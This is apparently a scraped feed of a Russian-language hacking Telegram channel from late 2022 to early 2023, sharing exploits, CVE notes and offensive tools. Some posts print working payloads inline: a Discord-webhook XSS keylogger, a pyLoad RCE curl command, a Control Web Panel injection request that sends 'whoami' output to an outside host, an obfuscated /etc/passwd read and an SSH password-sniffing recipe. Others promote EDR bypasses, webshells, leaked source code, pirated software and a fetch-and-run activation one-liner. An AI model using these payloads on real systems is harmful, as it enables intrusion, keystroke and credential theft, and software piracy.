Может лучше не ставить этот ваш windows 11 ?Скоро придется компьютер клеткой Фарадея накрывать, а вместо инета - юзать диод данных. *Ну так вот, объемный гайд по ОТКЛЮЧЕНИЮ ТЕЛЕМЕТРИИ и всякого зла от мелкомягких.*Windows 11 Debloat / Privacy Guide |
|
2023-01-29 12:08:58 |
PHP Development Server <= 7.4.21 - Remote Source Disclosureread#php #vuln |
|
2023-01-29 10:59:43 |
Exploit for full access to disk C:\ (for all users) pass: proxy_bardownload#exploit #C #windows |
|
2023-01-29 08:28:56 |
Invicti 2023 + REG file (бывший NetSparker)*archive Pass: proxy_bar |
|
2023-01-28 21:09:09 |
sshd_backdoor*/root/.ssh/authorized_keys evil file watchdog with ebpf tracepoint hook. Прикольно, а я все по старинке PAM модули прописываю, да и руткиты под *nix тем же занимаются.download#ssh #bckdoor |
|
2023-01-28 08:49:33 |
Будьте бдительны, скамеры не спят |
|
2023-01-28 06:00:00 |
Kali-PurpleThe ultimate SOC-in-a-box community project*1. Practice Ops: Virtualization, firewalls, VLAN, WAF, SIEM, IDS/IPS, ...2. Practice Red: Penetration testing of vulnerable machines while seeing what the blue team sees. 3. 3. Can you become stealthier?4. Practice Blue: Firewall and IPS rules, SIEM analysis and dashboard development, ...5. Purple teaming: Red and Blue working together to develop the ultimate set of rules6. Protect: Deploy Kali-Purple to protect your networkdownload |
|
2023-01-27 19:16:44 |
Пост восхваления хакера Raptor (ака Marco Ivaldi)Нужно отдать должное, как никак человек жизнь положил на алтарь exploit research.Ознакомьтесь с его github/0xdea и сплоитами которые он писал больше 20 лет - всегда бывает полезно глянуть в историю.#deadcow |
|
2023-01-27 05:06:23 |
cat /etc/passwd16bit format{\c''\a""t,/e''*?/?a?s??}или{\c''\a""\t,/\e''*?/\p*\d} |
|
2023-01-26 16:48:31 |
Слово "консультант" - предполагает под собой отказ от ответственности ? )))😁 |
|
2023-01-26 14:21:26 |
CVE-2022-34689Windows CryptoAPI spoofing vulnerability.Дырку в сыре обнаружили АНБ и NCSC Великобритании, она позволяет подделывать сертификаты коллизии MD5 и вообще манипуляции с сертификатом x.509. Exploit#windows #x509 |
|
2023-01-26 04:44:37 |
Yandex Git repository leaked *Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.а именно:aapi.tar.bz2admins.tar.bz2ads.tar.bz2alice.tar.bz2analytics.tar.bz2antiadblock.tar.bz2antirobot.tar.bz2autocheck.tar.bz2balancer.tar.bz2billing.tar.bz2bindings.tar.bz2captcha.tar.bz2cdn.tar.bz2certs.tar.bz2ci.tar.bz2classifieds.tar.bz2client_analytics.tar.bz2client_method.tar.bz2cloud.tar.bz2commerce.tar.bz2connect.tar.bz2crm.tar.bz2crypta.tar.bz2customer_service.tar.bz2datacloud.tar.bz2delivery.tar.bz2direct.tar.bz2disk.tar.bz2docs.tar.bz2drive.tar.bz2extsearch.tar.bz2fuzzing.tar.bz2gencfg.tar.bz2groups.tar.bz2helpdesk.tar.bz2infra.tar.bz2intranet.tar.bz2investors.tar.bz2it-office.tar.bz2jupytercloud.tar.bz2kernel.tar.bz2library.tar.bz2load.tar.bz2mail.tar.bz2maps.tar.bz2maps_2.tar.bz2maps_adv.tar.bz2market.tar.bz2metrika.tar.bz2mobile-WARNING-notfull.tar.bz2nginx.tar.bz2noc.tar.bz2partner.tar.bz2passport.tar.bz2pay.tar.bz2payplatform.tar.bz2paysys.tar.bz2portal.tar.bz2robot.tar.bz2rt-research.tar.bz2saas.tar.bz2sandbox.tar.bz2search.tar.bz2security.tar.bz2skynet.tar.bz2smart_devices.tar.bz2smarttv.tar.bz2solomon.tar.bz2stocks.tar.bz2tasklet.tar.bz2taxi.tar.bz2tools.tar.bz2travel.tar.bz2wmconsole.tar.bz2yandex_io.tar.bz2yandex360.tar.bz2yaphone.tar.bz2yawe.tar.bz2frontend.tar.bz2 |
|
2023-01-25 15:23:50 |
CVE-2023-23504 - Apple products*Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов. |
|
2023-01-24 13:59:48 |
Фу, блин, Но POC есть POC CVE-2023-22960Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.*Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд |
|
2023-01-23 09:00:31 |
LPE - Solaris 10Злоупотребление в dtprintinfo*Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красивоexploit |
|
2023-01-22 12:19:03 |
Это может быть интересноADReplStatus*Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023download |
|
2023-01-22 11:45:38 |
For BurpSuiteAPIKit:Discovery, Scan and Audit APIs Toolkit All In One.download#Burp #plugins |
|
2023-01-22 11:17:58 |
SugarCRM 0-day Auth Bypass + RCE Exploit |
|
2023-01-22 09:13:28 |
CVE-2023-0398 modoboa - mail ServerCSRF приводит к удалению домена*usage fot BURP:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/domains/4/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body></html>read |
|
2023-01-21 13:38:56 |
переоформим ! |
|
2023-01-21 13:17:38 |
CVE-2023-0179 PoCэксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6Понять глубину#linux #kernel #lpe #nftables |
|
2023-01-21 11:11:28 |
Microsoft Teams - RCEdownload |
|
2023-01-21 08:15:18 |
Коннектимся! |
|
2023-01-21 05:34:17 |
RDPAsynchronous RDP client for Python (headless) *Ну Вы понимаете, да ? )))подобрать |
|
2023-01-20 17:03:12 |
Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.BOT off как вы поняли |
|
2023-01-20 14:35:30 |
Wolfenstein 3D CGAТут и описание то не нужно. забрать#wolf #90 |
|
2023-01-20 05:22:32 |
В продолжении темыПоявился nuclei-template для дыры CVE-2022-47966.yamlНу и сам nuclei забрать тут****Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать |
|
2023-01-19 19:37:32 |
Exploiting null-dereferences in the Linux kernel Интересное#linux #kernel |
|
2023-01-19 18:50:00 |
SUDO KILLERТулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.download |
|
2023-01-19 16:23:57 |
Чаты и каналы Telegram по информационной безопасности 2023 Хорошая подборочка over 100, но нас в ней нет ((Забираем |
|
2023-01-19 14:43:56 |
CVE-2022-47966*Список ПО от ManageEngine подверженных атаке поражает !* Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.*read*POC/exploit*Usage:python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe |
|
2023-01-19 08:44:14 |
CVE-2023-22809 - опять Sudo, опять bypass😏#Unix #linux #sudo #bypass |
|
2023-01-18 11:38:40 |
NGINXConfigСамый простой способ настроить производительный, безопасный и стабильный NGINX сервер.Ну вдруг вам нужно, натыкали галочек, получили конфиг.НаТыкать#nginx |
|
2023-01-18 04:35:35 |
CVE-2022-46463 Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.Вообще Харбор крутая штука, для devops\devsecopsexploit#harbor #repo |
|
2023-01-17 12:35:40 |
ОТСТАВИТЬ ПАНИКУБОТ был и останется бесплатным.Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:1. Допуск по телеграмм id для всех желающихили2. Допуск как и раньше, но с таймаутом сообщений в 30 сек3. симбиоз первого и второго варианта |
|
2023-01-17 09:42:13 |
CVE-2023-0297Pre-auth RCE in pyLoadreadExploit Code:curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://<target>/flash/addcrypted2' |
|
2023-01-17 09:22:32 |
Windows Kernel Elevation of Privilege Vulnerability.CVE-2022-21881cve-2022-21881-io_completion-poc.cpp |
|
2023-01-16 16:41:53 |
ChatGPT - для RedTeam и BlueTeamГодная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber SecurityЕсли нет учетки OpenAI - попробовать свои силы можно в нашем боте#openAI |
|
2023-01-15 05:22:05 |
Cellebrite & MSABДанные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.*Утечка включает в себя фактическое программное обеспечение, а также документацию.*Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру. |
|
2023-01-15 04:33:49 |
next generation Firewall - а главное, надежный 😜 |
|
2023-01-14 07:32:22 |
chatGPT openAIпока в режиме тестаproxy_bar_openAI_bot#openAI #chatGPT #skynet |
|
2023-01-14 05:04:20 |
ExplorerPersistперехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.Ну а Persistence в том что отрабатывает каждый раз при запуске проводникаdownload |
|
2023-01-13 11:57:53 |
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))Для этих гребаных web-мастеров - motherfuckingwebsite.comЭтому не научат на курсахЧто то даже БаШорг вспомнился версии 2004 года....#humor #web #lol |
|
2023-01-13 09:53:55 |
охх))) RecycleBin снова в деле ! ) RecyclePersist |
|
2023-01-13 09:00:18 |
Новость по утечке в mail.ru - шляпа.И ничего полезного в ней нет. Разве что чисто на прозвон3505917 строк |
|
2023-01-13 04:43:48 |
CVE-2022-3656*Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера. |
|
2023-01-12 05:09:08 |
CVE-2023-21752Свежайшая Дыра (от 10 января) в службе резервного копирования WindowsLPE от юзера до системыAbout vulnexploit#windows #exploit #lpe |
|
2023-01-11 18:14:45 |
CVE-2023-0210В новый год, с новыми дырамиFlaw in Linux Kernel Allows Unauthenticated remote DOS AttacksPOC - ручками наберете#linux #kernel |
|
2023-01-11 17:53:04 |
Списки docker образов для прокачки Пентестаfor pentesterts |
|
2023-01-11 05:33:46 |
Активация windows и officeБыстрый способ без всяких KMS_autousage:PowerShell от админа и вставляем:irm https://massgrave.dev/get | iex и выбираем нужный пункт, ВСЁили такНу мало ли Вам нужно. |
|
2023-01-11 05:05:42 |
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit |
|
2023-01-10 12:50:56 |
ChatGPT Ultimate Resource Guide WoW |
|
2023-01-10 10:40:34 |
Атаки на банкоматы с использованием вредоносного ПОAzaZAвсе как вы любите |
|
2023-01-10 10:35:07 |
Chrome-V8 RCEexploit |
|
2023-01-10 05:03:27 |
ChatGPT_PoC - продолжаем наблюдение ))))#openAI |
|
2023-01-10 04:37:59 |
CVE-2022-31705POCGeekpwn 2022 Vmware EHCI OOBdownload |
|
2023-01-09 13:00:00 |
CVE-2022-41076The OWASSRF + TabShell exploit chaintabshell_poc.ps1 |
|
2023-01-09 11:05:21 |
Kerberos attacks 1-Kerberoasting AzaZa#Kerberos |
|
2023-01-08 17:17:57 |
CVE-2022-44877Control Web Panel Unauth RCEPOC usage:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-urlencodedusername=root&password=toor&commit=Login |
|
2023-01-08 11:20:47 |
Расходимся, мы тут лишниечитать всю статью |
|
2023-01-08 09:28:55 |
Malware Analysis Series (MAS): Article 7Опа, седьмая часть вышла !PDF#malware #destroy #happy |
|
2023-01-08 05:34:03 |
FilelessNtdllReflectionЕще один Bypass Userland EDRdownload#bypassEDR |
|
2023-01-07 06:40:03 |
ААА сука, в голосину)))))))))))))))Linux find Windows 10/11 OEM product key command*Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))sudo cat /sys/firmware/acpi/tables/MSDM | tail -1Смешное |
|
2023-01-07 06:31:29 |
UnhookingPatchBypass EDR download |
|
2023-01-06 17:09:37 |
Ребята, всем привет !!!!Прошел НОВЫЙ ГОД и вот вот наступит рождество !!!А это значит что PROXY_BAR всех Вас поздравляет, желает удачи, здоровья и взлома без последствий )))))В общем с праздниками ВАС )))))*****Ну и если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k |
|
2023-01-06 15:05:21 |
PhpMyAdmin Setup - доступен без аутентификации )))****1. ищем хосты через shodan и censys2. все IP сканим на на ниличие службы ПХПмайАдмин3. wappalyzer покажет php, лучше использовать php.txt 4. phpMyAdmin/setup найден )) |
|
2023-01-06 07:10:07 |
CVE-2022-44877Centos Web Panel 7 Unauthenticated Remote Code Executiondownload#centos #rce |
|
2023-01-06 05:08:50 |
OFFENSIVE SECURITY & REVERSE ENGINEERING (OSRE) Coursedownload |
|
2023-01-05 20:15:02 |
Alcatrazдвоичный обфускатор под x64, способный запутывать различные PE-файлы, включая:.exe.dll.sysdownload |
|
2023-01-05 12:25:55 |
Shellcode MutatorПрячемся от сигнатур !downloadusage:mutate.py [-h] [-t SHELLCODE_TEMPLATE] [-s SHELLCODE_FILE] [-m MORPH_PERCENTAGE] [-v] [-x86]#shellcode #Morphin |
|
2023-01-05 10:06:47 |
Casper-fs Это генератор пользовательских скрытых модулей ядра Linux. Каждый модуль работает в файловой системе для защиты и сокрытия секретных файлов. Понимаете ?)))*download*video |
|
2023-01-04 19:26:04 |
Gepetto: IDA plugin which queries OpenAI's ChatGPT to explain decompiled functionsdownload#ida #ai |
|
2023-01-04 13:10:19 |
exploit for CVE-2022-46164 осознать |
|
2023-01-04 12:49:44 |
Выносите святых, опять спулер (стар, но автоматичен)#windows #spooler #exploit #for_fun |
|
2023-01-04 12:44:10 |
Exploiting CVE-2022-42703 - Bringing back the stack attack Когда протекает память - почитать#linux #memory #exploit |
|
2023-01-04 12:38:35 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread_look |
|
2022-12-29 05:25:32 |
Kernel Exploits Recipes Notebookread#linux #kernel #exploit |
|
2022-12-28 05:40:26 |
WebKit+Kernel exploit chain for all PS Vita firmwares Ну вдруг вам нужно)download |
|
2022-12-27 17:57:00 |
Hidden firewall in Linux KernelКак дополнительный рубеж безопасности для сервера*ReadME*DownloadME*WatchMe |
|
2022-12-27 13:07:48 |
Коллекция Exploits - MacOS*CVE-2022-22583CVE-2022-22616CVE-2022-22639CVE-2022-26690CVE-2022-26712CVE-2022-26728CVE-2022-32786CVE-2022-32800*download#exploit #macOS |
|
2022-12-27 05:21:23 |
Force AdminСоздаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора. Лол, ну то есть админа тупо достали)))) как достать соседаdownload |
|
2022-12-25 15:06:37 |
Рубрика - нам пишутHey, I've got pretty cool project that you could put on proxybar*Shellcodevэто инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.download#shellcode |
|
2022-12-25 09:48:28 |
Linux kernel exploit development*book#exploiting #linux |
|
2022-12-24 17:08:03 |
CVE-2022-42046 Наконец то опубликовалиlocal privilege escalation POC download#windows #lpe #poc |
|
2022-12-23 10:58:54 |
Wordpress - XSS ( CVE-2022-29455)/wp-content/plugins/elementor/assets/js/frontend.min.jsusage:https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss |
|
2022-12-23 10:52:01 |
XSS Payload - Discord Keyloggerusage:<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>#discord #xss |
|
2022-12-23 07:48:50 |
Linux Kernel RCE (ksmbd)*CVSS SCORE: 10 из 10*Детали тутПатч прилетел в ядро только в ветке 5.15.61#10из10 |
|
2022-12-22 11:14:45 |
Охота на C2 C&C сервераПонимание работы и обнаружение фреймворков C2 (C&C) *1. Understanding & Detecting C2 Frameworks — TrevorC22. Understanding & Detecting C2 Frameworks — Ares3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)4. Understanding & Detecting C2 Frameworks — BabyShark*BonusTrack:Download BabyShark#C2 #hackers #botnets |
|
2022-12-22 06:29:41 |
CVE-2022-2602 - exploitОпубликован PoC Kernel Privilege Escalation Linux*О чем это, прочитать тут_1 и тут_2*POC (точнее два) - забратьExploit - забрать#linux #kernel #exploits |
|
2022-12-22 06:19:25 |
Оценка уязвимостей с помощью Nmap ?Вам нужен ВУльтерВьюер ! *Из коробки умеет:Server IP addressNetwork port numberNetwork port statusProtocol used by the network portNetwork service operating on the network port and its versionVulnerability CVE-identifierVulnerability ratingURL-link to the description of the vulnerability on the platform Vulners.comЗаказывайте прямо сейчас с уникальной финкой лгбтDownload |
|
2022-12-21 14:17:14 |
log4j ДА, еще один, но попрощеusage:python3 hik.py https://localhost:443 xxx.oastify.com:80downLoad |
|
2022-12-21 14:01:37 |
Php Remote file Inclusion and RCE in flatpressblog/flatpressProof of Concept#php #vuln |
|
2022-12-21 08:40:36 |
CloudmareПалим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.Но таки да - работает только если криво настроен DNS.download |
|
2022-12-21 08:14:02 |
Атаки на web-приложения на JAVAЭто обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.download*Bonus trackJar AnalyzerGUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода. download#java #security #web #hack |
|
2022-12-20 11:20:07 |
Только ВАЖНЫЕ вопросы ! #hackers #xss |
|
2022-12-19 11:24:38 |
linux injectorИнжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)usage:linux_injector <pid> <module>Да да, все так просто, иди уже.download |
|
2022-12-19 11:17:54 |
powershell-obfuscationОбфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)download |
|
2022-12-18 10:45:29 |
MacDirtyCowDemПолучаем root в macOS 13.0.1 через CVE-2022-46689exploit#root #macos #exploit |
|
2022-12-17 14:55:29 |
Dirty Vanityновая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.Слайды тутPOC тут#windows #bypass #edr |
|
2022-12-16 13:39:36 |
Бэкдоры в FreePBXPHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))Пятничное расследование читать#freepbx #backdoor |
|
2022-12-16 09:42:00 |
CVE-2022-28672Foxit PDF Reader Remote Code Execution Exploit (NOT POC)))) |
|
2022-12-16 09:38:19 |
Super XrayWeb Vulnerability Scannerdownload#web #vuln #scanner |
|
2022-12-16 09:30:54 |
Большая коллекция WEBSHELLSНа asp, aspx, php, jsp, pl, py, etcdownload#webshell |
|
2022-12-16 06:32:14 |
CVE-2022-45451 Acronis POCdownload |
|
2022-12-16 03:42:30 |
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) *1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging2. UNIX Symlink Following and Race Condition in Hardware Reporting 3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol4. UNIX Symlink Following in Log File Creation of saposcol5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol#linux #privesc #sec |
|
2022-12-16 03:11:03 |
DirCreate2SystemПолучаем NT AUTHORITY\\SYSTEM*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.*DOWNLOAD POC#windows #escpriv #POC #system |
|
2022-12-16 03:00:35 |
Пятничная викторина )))#docker #vuln |
|
2022-12-15 07:56:38 |
SIEMSIEM Tactics, Techiques, and Procedures read |
|
2022-12-09 10:00:40 |
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.Исследование, анализ и обход.Learn#windows #syscall #bypass |
|
2022-12-09 09:50:48 |
DCOMPotatoКоллекция эксплойтов /повышения привилегий службы DCOM.*doownload#exploit #dcom |
|
2022-12-09 06:44:51 |
Ну во первых с пятницей.А во вторых, Я тебя сука по IP вычислю*только для образовательных целей (нет)#track #ip #deanon |
|
2022-12-08 19:56:26 |
в предложку кстати |
|
2022-12-08 13:59:41 |
Defender Exclusions BOFХороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))0_щ |
|
2022-12-08 13:42:39 |
CVE-2022-2414Дырка в pki-coreуязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы. |
|
2022-12-08 08:52:08 |
Получаем пароль от SSH в открытом виде*1. получаем точный идентификатор sshdpgrep -l sshd2. Отслеживаем системные вызовы strace -f -p <ssh_PID> -e trace=write -o capture#ssh #sniff #password |
|
2022-12-08 08:14:33 |
CVE-2022-29596MicroStrategy Enterprise Manager 2022обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login#microsoft #bypass |
|
2022-12-08 07:51:03 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread |
|
2022-12-07 12:58:39 |
Burp Suite PRO version 2022.12.2 |
|
2022-12-07 06:30:34 |
PentagridSMS-шлюз с открытым исходным кодом для пентест проектовreadinstall and run#gsm #gateway #sms #2G/3G/4G/5G |
|
2022-12-07 06:04:44 |
Random C2 Profile Generatorдля cobalt-strikedownload#cobalt |
|
2022-12-07 05:33:30 |
PENTESTING BIBLE |
|
2022-12-06 10:33:45 |
Linux PrivEscЗлой CRON для самых маленьких - тут#linux #cron #esc |
|
2022-12-06 07:17:51 |
Bug Bounty Wordlistsdownload |
|
2022-12-05 11:57:02 |
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)download POC#windows #LPE #poc |
|
2022-12-05 07:13:32 |
The Defender’s Guide to the Windows Registryread#widows #defender #registry |
|
2022-12-04 17:44:16 |
Black Hat 2022 USA/ASIA/EuropeвидеоUSAASIAEUROPE |
|
2022-12-02 14:24:38 |
Recon Methods*part 1 - OSINT Host Discoverypart 2 - OSINT Host Discovery Continuedpart 3 - OSINT Employee Discoverypart 4 - Automated OSINTpart 5 - Traffic on the Target#cybersec #recon |
|
2022-12-01 20:21:12 |
WindowSpyЭто такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.download #cobaltstrike #module |
|
2022-12-01 14:22:21 |
The Linux Kernel Module Programming GuideNovember 10, 2022read |
|
2022-12-01 08:33:15 |
Microsoft Exchange ProxyNotShell RCEНе POC, а полноценный официальный exploit для metasploitdownload#rce #exploit #microsoft #metasploit |
|
2022-12-01 08:18:50 |
RCE root-уязвимость в утилите ping, поставляемой во FreeBSDCVE-2022-23093read |
|
2022-11-30 08:44:00 |
такое конечно, но актуальнее с каждым днем |
|
2022-11-30 08:10:51 |
модуль Metasploit для удаленного управления для развертывания полезной нагрузки и запуска ее с сервераRemote Control Collection Remote Code Executiondownload#exploit #remote |
|
2022-11-29 16:07:20 |
Vulnerability Feed#vuln #exploits |
|
2022-11-29 10:27:50 |
regex GitHub Dorks /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ |
|
2022-11-29 05:42:49 |
SpartacusDLL Hijacking Discovery ToolТот спартак вроде оскар получил)) #dll |
|
2022-11-29 05:35:29 |
Рановато, но таки даТОП 10 из 20221. Follina (CVE-2022-30190)2. Log4Shell (CVE-2021-44228)3. Spring4Shell (CVE-2022-22965)4. F5 BIG-IP (CVE-2022-1388)5. Google Chrome zero-day (CVE-2022-0609)6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)9. Atlassian Confluence RCE flaw (CVE-2022-26134)10. Zyxel RCE vulnerability (CVE-2022-30525) |
|
2022-11-25 07:18:33 |
Malware Analysis Seriespdf |
|
2022-11-25 07:13:29 |
Ох лоооол)))0day fanslink |
|
2022-11-22 19:23:00 |
MEGA 6500%в июне 2022 года я обнаружил уязвимость в системе облачного хранения MEGA, которая позволяла мне хранить больше данных, чем разрешено для бесплатных учетных записей. Мне удалось сохранить примерно 1300 ГБ данных в MEGA, несмотря на то, что ограничение на бесплатное хранилище для MEGA составляет 20 ГБ.Видела ман в сентябре, там был другой подход !Через яндекс фотки можно было попась в яндекс деньгиПочитать стори |
|
2022-11-22 13:37:53 |
Для Red Team*Red Team Management by JoasAwesome Red Team by yeyintminthuhtutAwesome Red Team Operations by Joas |
|
2022-11-22 12:57:04 |
CVE-2022-41924 RCE in Tailscale (vpn service)занятный research#vpn #rce #research |
|
2022-11-22 07:49:05 |
wireguard-initramfs*Включает wireguard во время загрузки ядра до монтирования зашифрованных разделов. В сочетании с dropbear это может обеспечить ПОЛНОСТЬЮ ЗАШИФРОВАННУЮ удаленную загрузку без хранения ключевого материала.Вообще есть конечно способы проще, но мало ли кому пригодится.download#security #linux |
|
2022-11-22 05:55:19 |
ViperSoftX: Hiding in System Logs and Spreading VenomSoftXна почитать |
|
2022-11-22 04:53:34 |
просто положу тутcypherhound |
|
2022-11-22 04:38:39 |
Прикольнопроверить, подвержены ли вы известной уязвимости в вашем оборудовании (ЦП) при использовании Linux, бонусом статус устранения:grep -r . /sys/devices/system/cpu/vulnerabilities/ |
|
2022-11-22 04:15:09 |
Active Directory Attack Cheat SheetRead#AD #attack |
|
2022-11-18 09:41:21 |
Всем привет !!!Вчера у нас был день рождения, каналу исполнился один год.Год был не простой, многое изменилось, приходили и уходили люди, менялась концепция канала, выстраивалась модель поведения.***Много интересных людей постучалось в ЛС с интересными предложениями, (спасибо Вам большое), некоторые из них мы начнем реализовывать уже сегодня.***Начнем с общего ЧАТа для общения и обмена опытом ЧЯТ***Если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8kС днем рождения proxy-bar !!!Иногда тут куется контент))) |
|
2022-11-18 05:39:59 |
будь в курсеinvite to defcon.social |
|
2022-11-18 05:31:06 |
ArtfuscatorЛучший подход к психологической войне против reverse-инженеров.Звучит конечно жирно,))downLoad |
|
2022-11-18 05:16:20 |
Рабочий PoC для CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)*python poc_aug3.py <host> <username> <password> <command>*download POC |
|
2022-11-11 20:17:38 |
kernel r/w exploit for iOS 15 and macOS 12 *Эксплойт объединяет 4 уязвимости:CVE-2022-32845 : aned signature check bypass for model.hwx.CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.Протестировано на:iPhone12 Pro (iPhone13,3) with iOS 15.5.iPad Pro (iPad8,10) with iPadOS 15.5.iPhone11 Pro (iPhone12,3) with iOS 15.4.1.MacBookAir10,1 M1 with macOS 12.4. |
|
2022-11-11 15:45:40 |
Кто твой источник ?Сбор информации из dark-web и темных уголков clearNet в контексте разведки киберугроз.deepdarkCTI Откуда:* Telegram channels, groups and chats* Discord channels* ransomware gangs sites* forums related to cyber criminal activities and data leaks* markets* exploits databases* Twitter accounts* RaaS (Ransomware As A Service) sitesНекоторые могут найти себя 😎#osint #Cyber_Threat_Intelligence |
|
2022-11-11 11:47:54 |
значит, случаи были |
|
2022-11-10 20:55:27 |
Вот так оно все и начинается - отличный тред - "У меня есть друг, друг пишет руткиты, а недавно я купил новый ноут, ноут стал странно себя вести и друг хохочет"Теперь комьюнити разворачивает детективную серию по поиску черной кошки в темной комнате.А был ли мальчик ? и был ли rootkitПочитать на ночь removing-a-rootkit (комменты обязательно)#idiots #exFriend |
|
2022-11-10 18:27:28 |
Backdooring Office Structures. Part 1: The Oldschool Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts #old |
|